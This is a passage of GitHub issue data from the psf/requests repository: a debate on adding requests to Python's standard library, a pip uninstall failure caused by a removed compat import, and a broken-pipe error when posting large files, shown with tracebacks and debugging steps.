{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 31, "-1": 0, "confused": 0, "eyes": 0, "heart": 10, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 41, "url": "https://api.github.com/repos/psf/requests/issues/2424/reactions" }
https://api.github.com/repos/psf/requests/issues/2424/timeline
null
completed
null
null
false
[ "Yes, because it simplifies the entire process and does not sacrifice the performance. So yes.\n", "- What kind of impact would this have on Requests' ability to evolve and grow?\n- Does Requests' release frequency jive with that of Python's? A big difference here might be a good indication that stdlib isn't the right home for Requests.\n", "Let's CC some people whose opinions we care strongly about:\n\n@shazow @kevinburke @dstufft @alex @sigmavirus24\n", "What happened to \"the standard lib is where things go to die\"?\n", "The release cadence question is a good one; I'd be concerned about losing request's ability to evolve freely. That said, perhaps a requests core library would be a good fit.\n", "My 2 $CURRENCY's worth:\n\nI would be disinclined to do it. I think being outside the standard library has given us the freedom to make choices that benefit our users without being stuck behind core dev's policies for version support and release. It allows us to respectfully disagree with the priorities of core dev. And it allows us to make decisions that are ideological, which has been the lifeblood of this project for more than three years.\n\nI think the reality is that if this module enters the standard library the current core team will move on from it. I certainly have little interest following it into the quagmire that is core dev. The most likely to steward requests in the stdlib is @sigmavirus24, and he's just one man. That loss of direction will inevitably lead to an erosion of the library's interface over time, and I think that would be a tragic thing.\n\nThe only thing that being in the standard library gives us is our time back. That's a good reason to put it there, if that's what you think it needs, but I don't think we should pretend that it will make the library or the Python ecosystem any better.\n", "I don't think you actually _can_ add requests to the stdlib without first adding chardet and urllib3 or removing your dependency on them. There's also the thing where Python doesn't want to ship a CA Bundle so you'd need to modify it so that it uses the system platform bundle as Python does naturally now.\n\nBesides that, I'm not sure. It would certainly make it easier to get requests, however part of my work on pip is basically to make it so it's easy to get things like requests without needing to add it to the stdlib. On top of that it's also somewhat confusing to have multiple ways to make HTTP requests in the Python stdlib. The unification of urllib and urllib2 was a good thing in the Python stdlib and I don't think that re-adding that with urllib.request and \"requests\" is a good idea either. Finally I don't think it would actually help many people, this would only go into 3.5+ so anyone who wants to use requests would have to either use the version that is on PyPI or making 3.5 their minimum supported Python version which I don't think is a realistic thing to happen in any near future.\n", "While I think having Requests in the standard library would help new users I don't know that it would help the Python community as a whole. Experienced users know to use Requests and know how to install it.\n\nI'd be especially concerned with the chilling effect it would have on new development as others would be disinclined to contribute, knowing that they wouldn't see their contributed changes in an easily-usable release for a long time. \n\nWhat about the middle ground of making Python distributions ship with it installed by default?\n", "No it wouldn’t.\n\nrequests is absolutely unsuitable for stdlib inclusion for the many reasons stated before me. The urllib3 dependency alone is a complete showstopper; we don’t want it to got to die in the stdlib.\n\nWhat _would_ be useful is to add something _basic_ and similar to requests built on top of stdlib’s current http resources that allows users to do simple get/post requests to https without practicing blood magic.\n\nAlso kind reminder that it would be added to Python 3 only. :) (and not earlier than Python 3.6).\n\nAre you getting tired of maintaining it Kenneth? ;)\n", "I don't think we can even begin to discuss this question without someone saying what becomes of httplib, urllib, and friends. Adding requests without addressing the complexity of choice is, I think, worse than the answer \"ignore teh stdlib, just use requests\". It's a regression to the days of urllib, urllib2.\n", "> I think the reality is that if this module enters the standard library the current core team will move on from it. I certainly have little interest following it into the quagmire that is core dev. The most likely to steward requests in the stdlib is @sigmavirus24, and he's just one man. That loss of direction will inevitably lead to an erosion of the library's interface over time, and I think that would be a tragic thing.\n\nI would wander into the stdlib to try to help, but given the fact that exactly one of I don't know how many previous patchsets I've submitted has been accepted and one other _reviewed_ makes me wary of wanting to bother with that process. I know the core devs are entirely swamped by more important things. I also know someone else has decided randomly that they want to maintain httplib/http but they're clearly not suited for the job (yet) and I don't have the patience to work on httplib when patches that both @Lukasa and I sit around, unreviewed, and not cared about (when they fix pressing issues with the library).\n\nI'd probably end up just forking requests to continue using it.\n\n> requests is absolutely unsuitable for stdlib inclusion for the many reasons stated before me. The urllib3 dependency alone is a complete showstopper; we don’t want it to got to die in the stdlib.\n\nIt's always been a contention of @kennethreitz (and therefore, the project as a whole) that urllib3 is an implementation detail. Many of requests' biggest features are handled entirely by urllib3, but it doesn't mean they couldn't be reimplemented with care into truly dependency-less library.\n\nRegarding the chardet dependency: it's been nothing but a headache to us (and to me specifically). It used to have separate codebases for py2 and py3 until I got it into a single codebase library (which has only in the last several months been merged back into chardet proper). The library is slow and a huge memory hog (which angers many people to the point of yelling at us here on the issue tracker). It's not entirely accurate and Mozilla's universalchardet that it is modeled after has all but been abandoned by Mozilla. So removing chardet would probably be a net positive anyway.\n\nRegarding whether we should do this or not, I'm frankly unconcerned. Whatever would be in the stdlib would end up being requests in API only. The Python 3 adoption rate is slow enough that I don't think people will be meaningfully affected by this for the next N years (where N is the globally unknown number of years for 3.5 to be used in production by corporations).\n\nAnd like I said, I'd probably end up just forking requests or using urllib3 directly at that point.\n", "I discussed this at length with Guido the other day — chardet would have to be included first. I think that urllib3 and requests could be included into the http package together. \n\nHowever, I'm very inclined to agree with @hynek and @dstufft. Perhaps requests is fine just the way it is :)\n", "Either way, if you have an opinion that you'd like to share, you are welcome to share it here (or anytime really). \n\n:sparkles: :cake: :sparkles:\n", "Also, adding a new http module to the stdlib with no asyncio-story seems\nbonkers to me.\n\nOn Sun Jan 25 2015 at 1:15:51 PM Kenneth Reitz [email protected]\nwrote:\n\n> Either way, if you have an opinion that you'd like to share, you are\n> welcome to share it here (or anytime really).\n> \n> [image: :sparkles:] [image: :cake:] [image: :sparkles:]\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2424#issuecomment-71384152\n> .\n", "> I don't think we can even begin to discuss this question without someone saying what becomes of httplib, urllib, and friends\n\nThis is my issue. I think the current confusing state of affairs has to be sorted out first.\n", ":+1: :metal:\n", "Just to be clear, my above comment about re-implementing urllib3 for inclusion in the stdlib shouldn't be taken lightly. The amount of work necessary to do that would be immense because urllib3 is the product of (likely 10 or more) years of developer work.\n", "I too have spoken with Guido about tossing urllib3 into the stdlib some years ago with the conclusion that it's not a great idea, but I'm fairly neutral about it at this point.\n\nurllib3's API has been mostly-stable and pretty much completely backwards compatible for several years now. Its' pace is possibly even slower than that of the stdlib today, with the vast majority of changes being minor fixes or security improvements (with occasional backwards-compatible feature additions like granular timeouts/retries). If somebody really wanted to try and get urllib3 into the standard library, I don't think it's a terrible idea—it's just not the _best_ idea.\n\n(I'm not speaking for requests, as it moves at a very different pace with different goals than urllib3.)\n\nThe best idea, in my opinion, would be for the PSF to hire (or maybe Kickstart or something) 1-3 developers to build out a brand new http library on top of asyncio with HTTP/2 support with heavy inspiration from urllib3, requests, and hyper. I'd be happy to see as much code taken verbatim as possible but laid out in a consistent, modular, and reusable manner. Ideally target Python 4 or something, and get rid of all the urllibs and httplibs. I expect this would be 6-9mo of hard work, but possibly more.\n\nThe very worst part about urllib3, which I'd love to see replaced if somebody attempts to rewrite it per @sigmavirus24's suggestion, is that it depends on httplib. urllib3's functionality is substantially limited with lots of code spent working around shortcomings of httplib. Though if HTTP/2 support would be taken seriously in this goal, then the scope of re-implementing HTTP/1.1 would be a very comforting fraction of the work required.\n\nMany PyCons ago, a bunch of us met up and whiteboarded a layout of a brand new http library that refactors all the pieces into the ideal arrangement we could imagine at the time. I'd be happy to dig up these notes if anyone is going to attempt this.\n", "+1 @shazow\n\nAgain, if anyone finds themselves with the time and inclination to take on that fairly large project, I've sketched out a putative API design that might make a good starting point.\n", "Yes because the only way I will ever allow requests as a dependency is if its in stdlib.\n\nThat said, urllib3 contains the features that people really want, so having that in stdlib is enough for me\n", "Do you not use any dependencies? \n", "@dstufft this is in projects that generally don't, where everyone can't be bothered to figure out how to use urllib. (people aren't adding it as a dep because of ssl/etc generally, but out of laziness)\n", "@dstufft also multi-version deps basically make it hard to use things in libraries. You probably want to use requests in your project and if we require it then there's a potential for a world of hurt if API changes happen in versions.\n", "While I appreciate some people wanting to develop dependencies without dependencies on other software that hasn't changed its API in years, this isn't the place for the discussion.\n", "@sigmavirus24 I disagree. requests has had its API change in the past. APIs change, thats why we have versioning, thats why dependencies are complex. This is a perfect case for that discussion because requests is a dependency in a lot of projects.\n\nIf you move into the stdlib the API must be stable.\n", "@dcramer the API broke exactly once, in 1.0. APIs do change, but requests' API isn't planning any changes either. The only change we've had is adding the `json` parameter which doesn't break anything. You can keep trying to accuse us of breaking the API too much, but when projects like OpenStack have had requirements defined as `>=1.2.3` for a long time, I think that says a lot about the stability of requests. The API has been stable, precisely because after we cut 1.0 we rejected all new additions to the API (with the obvious recent exception of adding a `json` param) and we've been very strict about not breaking the API. If you're not a consumer of requests, you wouldn't know this though. So I don't take your ignorance personally.\n", "Further if the stdlib API is supposedly so stable, explain why argparse broke it's public API between Python 3.3 and 3.4?\n", "@sigmavirus24 you're now purely turning this into an API debate. I was just pointing out the reason I dont include it is because it can change, and everyone uses it, and everyone uses different versions. It's great that you guys never change your API but I have no desire or time to follow it or assume thats true.\n", "You know Python changes it's API too, quite often actually, sometimes in very major ways, perhaps you've heard of Python 3?\n", "Well i'm leaving this debate. I made my opinions clear. Not sure what you're all bitching about.\n" ]
https://api.github.com/repos/psf/requests/issues/2423
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2423/labels{/name}
https://api.github.com/repos/psf/requests/issues/2423/comments
https://api.github.com/repos/psf/requests/issues/2423/events
https://github.com/psf/requests/issues/2423
55,359,316
MDU6SXNzdWU1NTM1OTMxNg==
2,423
requests 2.5.0 uninstall fails
{ "avatar_url": "https://avatars.githubusercontent.com/u/715626?v=4", "events_url": "https://api.github.com/users/dsoprea/events{/privacy}", "followers_url": "https://api.github.com/users/dsoprea/followers", "following_url": "https://api.github.com/users/dsoprea/following{/other_user}", "gists_url": "https://api.github.com/users/dsoprea/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/dsoprea", "id": 715626, "login": "dsoprea", "node_id": "MDQ6VXNlcjcxNTYyNg==", "organizations_url": "https://api.github.com/users/dsoprea/orgs", "received_events_url": "https://api.github.com/users/dsoprea/received_events", "repos_url": "https://api.github.com/users/dsoprea/repos", "site_admin": false, "starred_url": "https://api.github.com/users/dsoprea/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/dsoprea/subscriptions", "type": "User", "url": "https://api.github.com/users/dsoprea", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2015-01-24T05:09:41Z
2021-09-08T23:06:03Z
2015-01-24T16:20:51Z
CONTRIBUTOR
resolved
Installing the latest (2.5.1) or 2.5.0 (in the examples, below), installs a version that can't be uninstalled or upgraded, though it imports without a problem. I show how 2.2.0 (my previous version) didn't have this problem. Install 2.5.0: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip install requests==2.5.0 Downloading/unpacking requests==2.5.0 Downloading requests-2.5.0-py2.py3-none-any.whl (464kB): 464kB downloaded Installing collected packages: requests Successfully installed requests Cleaning up... ``` Can successfully import: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ python Python 2.7.6 (default, Mar 22 2014, 22:59:56) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import requests >>> ``` Can't uninstall, though: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip uninstall requests Traceback (most recent call last): File "/usr/bin/pip", line 9, in <module> load_entry_point('pip==1.5.4', 'console_scripts', 'pip')() File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 519, in load_entry_point return get_distribution(dist).load_entry_point(group, name) File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 2630, in load_entry_point return ep.load() File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 2310, in load return self.resolve() File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 2316, in resolve module = __import__(self.module_name, fromlist=['__name__'], level=0) File "/usr/lib/python2.7/dist-packages/pip/__init__.py", line 11, in <module> from pip.vcs import git, mercurial, subversion, bazaar # noqa File "/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py", line 9, in <module> from pip.download import path_to_url File "/usr/lib/python2.7/dist-packages/pip/download.py", line 25, in <module> from requests.compat import IncompleteRead ImportError: cannot import name IncompleteRead ``` Cleanup, manually: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo rm -fr requests* ``` Installing 2.2.0 (the okay version): ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip install requests==2.2.0 Downloading/unpacking requests==2.2.0 Downloading requests-2.2.0-py2.py3-none-any.whl (623kB): 623kB downloaded Installing collected packages: requests Successfully installed requests Cleaning up... ``` Uninstalls, fine: ``` dustin@deploy1:/usr/local/lib/python2.7/dist-packages$ sudo pip uninstall requests Uninstalling requests: /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/DESCRIPTION.rst /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/METADATA /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/RECORD /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/WHEEL /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/pydist.json /usr/local/lib/python2.7/dist-packages/requests-2.2.0.dist-info/top_level.txt /usr/local/lib/python2.7/dist-packages/requests/__init__.py /usr/local/lib/python2.7/dist-packages/requests/__init__.pyc /usr/local/lib/python2.7/dist-packages/requests/adapters.py ... /usr/local/lib/python2.7/dist-packages/requests/sessions.pyc /usr/local/lib/python2.7/dist-packages/requests/status_codes.py /usr/local/lib/python2.7/dist-packages/requests/status_codes.pyc /usr/local/lib/python2.7/dist-packages/requests/structures.py /usr/local/lib/python2.7/dist-packages/requests/structures.pyc /usr/local/lib/python2.7/dist-packages/requests/utils.py /usr/local/lib/python2.7/dist-packages/requests/utils.pyc Proceed (y/n)? y Successfully uninstalled requests ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2423/reactions" }
https://api.github.com/repos/psf/requests/issues/2423/timeline
null
completed
null
null
false
[ "This isn't our fault I don't think: your exception comes from pip. @dstufft?\n", "## This looks like you installed pip using your system package manager and it needs a version of requests installed. \n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Yea what @sigmavirus24 said. Some systems unbundle requests from pip.\n", "@dstufft is this maybe related to debian preventing pip from removing packages installed by the system package manager?\n", "No, I think it's just because Debian unbundles requests. So whatever version of requests you install to the system needs to be compatible with what pip expects.\n", "Interesting that there's a difference in our compat module between 2.2.0 and 2.5.0.\n", "Seems it was removed in https://github.com/kennethreitz/requests/commit/47d0517d66e8cf5832768262221f0357ae134ad1\n\nI assume pip has already worked around this?\n", "pip itself doesn't use it anymore, but the version of pip that Debian has in it's system packages is older than when we worked around it.\n", "Yeah, so I'm pretty sure this is one of those cases where we shouldn't have let @jschneier remove that import in `requests.compat` (our fault) mixed with the constant of \"`sudo pip install x` is evil; use virtualenvs\".\n\nWe _could_ add the import back, but I would then mark it for deletion in 3.0 so this problem would just pop up again. So I'm going to close this since there's no solution that won't result in further breakage of other packages down the road.\n", "Interesting. Thanks for considering the issue. So it's generally considered bad to install _PIP_ via the OS's package manager?\n", "It's generally considered _best_ practice to do development inside of `virtualenv`s and in some cases, deploy inside of them as well so inter-application dependencies don't conflict with each other (unless you have a very sophisticated way of ensuring that two applications relying on the same dependencies don't break). Using the operating system's package manager for certain things (like `pip`) is okay _most_ of the time. It totally depends on what you're doing. With that said, this ticket isn't the place to discuss in depth downstream redistributors of python packages or what happens when they package python software.\n", "I agree with the _virtualenv_ usage. I didn't realize that was decoupled\nfrom the OS's version of _pip_ (how else would it even be available?).\n\nDustin\n\nOn Mon, Jan 26, 2015 at 9:20 AM, Ian Cordasco [email protected]\nwrote:\n\n> It's generally considered _best_ practice to do development inside of\n> virtualenvs and in some cases, deploy inside of them as well so\n> inter-application dependencies don't conflict with each other (unless you\n> have a very sophisticated way of ensuring that two applications relying on\n> the same dependencies don't break). Using the operating system's package\n> manager for certain things (like pip) is okay _most_ of the time. It\n> totally depends on what you're doing. With that said, this ticket isn't the\n> place to discuss in depth downstream redistributors of python packages or\n> what happens when they package python software.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2423#issuecomment-71466842\n> .\n" ]
https://api.github.com/repos/psf/requests/issues/2422
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2422/labels{/name}
https://api.github.com/repos/psf/requests/issues/2422/comments
https://api.github.com/repos/psf/requests/issues/2422/events
https://github.com/psf/requests/issues/2422
55,284,235
MDU6SXNzdWU1NTI4NDIzNQ==
2,422
Broken pipe Exception
{ "avatar_url": "https://avatars.githubusercontent.com/u/1229983?v=4", "events_url": "https://api.github.com/users/cloverstd/events{/privacy}", "followers_url": "https://api.github.com/users/cloverstd/followers", "following_url": "https://api.github.com/users/cloverstd/following{/other_user}", "gists_url": "https://api.github.com/users/cloverstd/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/cloverstd", "id": 1229983, "login": "cloverstd", "node_id": "MDQ6VXNlcjEyMjk5ODM=", "organizations_url": "https://api.github.com/users/cloverstd/orgs", "received_events_url": "https://api.github.com/users/cloverstd/received_events", "repos_url": "https://api.github.com/users/cloverstd/repos", "site_admin": false, "starred_url": "https://api.github.com/users/cloverstd/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/cloverstd/subscriptions", "type": "User", "url": "https://api.github.com/users/cloverstd", "user_view_type": "public" }
[ { "color": "e11d21", "default": false, "description": null, "id": 136589914, "name": "Needs Info", "node_id": "MDU6TGFiZWwxMzY1ODk5MTQ=", "url": "https://api.github.com/repos/psf/requests/labels/Needs%20Info" } ]
closed
true
null
[]
null
61
2015-01-23T14:03:14Z
2016-11-30T09:12:06Z
2015-04-11T02:58:50Z
NONE
null
I post a large file to server, and it raise `ConnectionError` exception. ``` Traceback (most recent call last): File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/worker.py", line 479, in perform_job rv = job.perform() File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/job.py", line 466, in perform self._result = self.func(*self.args, **self.kwargs) File "./jobs/office.py", line 97, in notice_file open('test.pdf', 'rb'))) File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/enterprise/client/api/media.py", line 15, in upload 'media': media_file File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/api/base.py", line 20, in _post return self._client._post(url, **kwargs) File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py", line 74, in _post **kwargs File "/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py", line 39, in _request **kwargs File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/api.py", line 49, in request response = session.request(method=method, url=url, **kwargs) File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py", line 461, in request resp = self.send(prep, **send_kwargs) File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py", line 573, in send r = adapter.send(request, **kwargs) File "/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/adapters.py", line 415, in send raise ConnectionError(err, request=request) ConnectionError: ('Connection aborted.', error(32, 'Broken pipe')) ``` The `test.pdf` is 4.2M, when I post it as a file, I get ConnectionError Exception. But I use curl to post it to server, it can be uploaded successful.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2422/reactions" }
https://api.github.com/repos/psf/requests/issues/2422/timeline
null
completed
null
null
false
[ "Can you reproduce it every time? What curl command are you using? Does the\nserver have any useful log messages?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Fri, Jan 23, 2015 at 6:03 AM, Cloverstd [email protected] wrote:\n\n> I post a large file to server, and it raise ConnectionError exception.\n> \n> Traceback (most recent call last):\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/worker.py\", line 479, in perform_job\n> rv = job.perform()\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/rq/job.py\", line 466, in perform\n> self._result = self.func(_self.args, *_self.kwargs)\n> File \"./jobs/office.py\", line 97, in notice_file\n> open('test.pdf', 'rb')))\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/enterprise/client/api/media.py\", line 15, in upload\n> 'media': media_file\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/api/base.py\", line 20, in _post\n> return self._client._post(url, *_kwargs)\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py\", line 74, in _post\n> *_kwargs\n> File \"/Users/cloverstd/Dropbox/WorkSpace/gench/enterprise/wechatpy/client/base.py\", line 39, in _request\n> *_kwargs\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n> response = session.request(method=method, url=url, *_kwargs)\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n> resp = self.send(prep, *_send_kwargs)\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n> r = adapter.send(request, *_kwargs)\n> File \"/Users/cloverstd/.virtualenvs/enterprise/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n> raise ConnectionError(err, request=request)\n> ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n> \n> The test.pdf is 4.2M, when I post it as a file, I get ConnectionError\n> Exception.\n> But I use curl to post it to server, it can be uploaded successful.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2422.\n", "Have you tried without using `rq`? Are you using curl within `rq`?\n", "Same here. I'm using requests to post large files (about 8 Mb in total) to a Django endpoint. Getting same error. It does work fine with smaller files.\n", "@barseghyanartur perhaps you can give us more details than @cloverstd did, for example, what code will reproduce this?\n\nI have a suspicion as to the cause but I haven't been able to reproduce this yet.\n", "@sigmavirus24 \n\nI have gone a bit further in research and this is what I have found.\n\nBasically, it's this:\n\n```\nrequests.post(some_url, data=data_dict, files=files_dict)\n```\n\nEnvironment details:\n- Python==2.7.3\n- requests==2.5.1\n\nI managed to reproduce the problem exactly. In my case, the endpoint is a multi-lingual Django site. Requests to URL without the language prefix (like \"http://example.com/foo/endpoint/\") do get redirected to the same URL with the language prefix (like \"http://example.com/en/foo/endpoint/\").\n\nIf `some_url` is \"http://example.com/foo/endpoint/\" I get an error:\n\n('Connection aborted.', error(32, 'Broken pipe'))\n\nIf `some_url` is \"http://example.com/en/foo/endpoint/\" it all goes fine. Likely, `requests` doesn't handle large post requests to endpoints which do redirect them to some other endpoints.\n\nI have just tried it with requests==2.6.0 and I do get the same problem.\n", "@barseghyanartur can you give us the status code from the redirect?\n", "I wonder if the remote end isn't expecting a body but we're sending it anyway, so we get our connection torn down.\n", "@Lukasa or if we change the method (i.e., in a case like 7231 Section 6.6.4) without stripping the body/content-length. (or strip the body and not the content-length).\n", "Really any information @barseghyanartur can give us about the redirect response and the subsequent request will be helpful\n", "@sigmavirus24 \n\nHey, thanks for getting back on this. I'll post it here quite soon after I get home. :) That's gonna be in about 5 hours.\n", "@barseghyanartur no rush. I'd like to fix this once and for all. That can be today or next week. As long as it's fixed, I'll be happy.\n", "@sigmavirus24 \n\nI don't get any response back, since it fails hard.\n\n``` py\nTraceback (most recent call last):\n File \"requests_test.py\", line 29, in <module>\n response = requests.post(url, data=data, files=files)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/api.py\", line 108, in post\n return request('post', url, data=data, json=json, **kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/api.py\", line 50, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/sessions.py\", line 464, in request\n resp = self.send(prep, **send_kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/sessions.py\", line 576, in send\n r = adapter.send(request, **kwargs)\n File \"/home/me/.virtualenvs/env/local/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nrequests.exceptions.ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n```\n\nAnd this is the code:\n\n``` py\nimport os\n\nimport requests\n\nurl = 'http://localhost:8001/foo/endpoint/'\n\ndata = dict(['input_{0}'.format(index), 'some value {0}'.format(index)] for index in range(10))\n\nFILES = (\n '/home/me/bbrepos/requests_test/media/1.gif',\n '/home/me/bbrepos/requests_test/media/2.gif',\n)\n\nfiles = dict(['file_{0}'.format(index), (os.path.basename(file_path), open(file_path, 'rb'))] for index, file_path in enumerate(FILES))\n\nresponse = requests.post(url, data=data, files=files)\n```\n", "@barseghyanartur you can determine what the redirect codes, etc. are with `requests.post(url, data=data, files=files, allow_redirects=False)`\n", "@sigmavirus24 \n\nAh, sorry, I didn't realise you were asking for that. It was 301, as far as I remember.\n", "Given that this is all plaintext, you should be able to get a packet capture of the whole transaction. Running `tcpdump -nnvvXSs 1514 port 8001 and host localhost` should do the trick.\n", "I'm having the same problem: small (1MB) data works, but large (50MB) data breaks ('Connection aborted.', error(32, 'Broken pipe')). 
\n\nThe complications in my case are that (1) I don't control the Web service -- it's the property of another company; (2) the protocol is HTTPS, but perhaps the packet capture would still be informative, even if the payload data is encrypted from tcpdump's point of view.\n\nI will get a packet capture of a broken large transaction and reply back.\n", "I created the tcpdump file https://gist.github.com/JazzFan/fc55e28c525518ada71f with this command:\n `sudo tcpdump -nnvvXSs 1514 port 443 and host 54.200.58.94`\n\nMy program ran under Python 2.7.8, with `requests` 2.5.3 (but I feel pretty confident that I can get it to break under other versions of Python or `requests`, if you would prefer others).\n\nThe relevant lines of the Python program:\n\n```\n import requests\n ...\n headers = {'Content-Type': 'application/json'}\n response = requests.post(URL, data=wrapped_chunk, headers=headers)\n```\n\nThe idea of the program is to split a large file into 50MB chunks, wrap each chunk with a bit of JSON, then POST it to the Web service API that a vendor company provides to my company.\n\nThe stack trace (home dir redacted with `~`)\n\n```\nTraceback (most recent call last):\n File \"~/bin/progname.py\", line 399, in <module>\n main()\n File \"~/bin/single_process.py\", line 33, in _\n return f(*a, **kw)\n File \"~/bin/progname.py\", line 392, in main\n max_return_code = send_file_chunks(fn, api_key, args.parallelism)\n File \"~/bin/progname.py\", line 347, in send_file_chunks\n chunk_filenames))\n File \"~/anaconda/envs/py278/lib/python2.7/multiprocessing/pool.py\", line 251, in map\n return self.map_async(func, iterable, chunksize).get()\n File \"~/anaconda/envs/py278/lib/python2.7/multiprocessing/pool.py\", line 558, in get\n raise self._value\nrequests.exceptions.ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n```\n\nI realize the stack trace has everything but `requests` in it; let me know if that's a problem and I'll write a simpler program in 
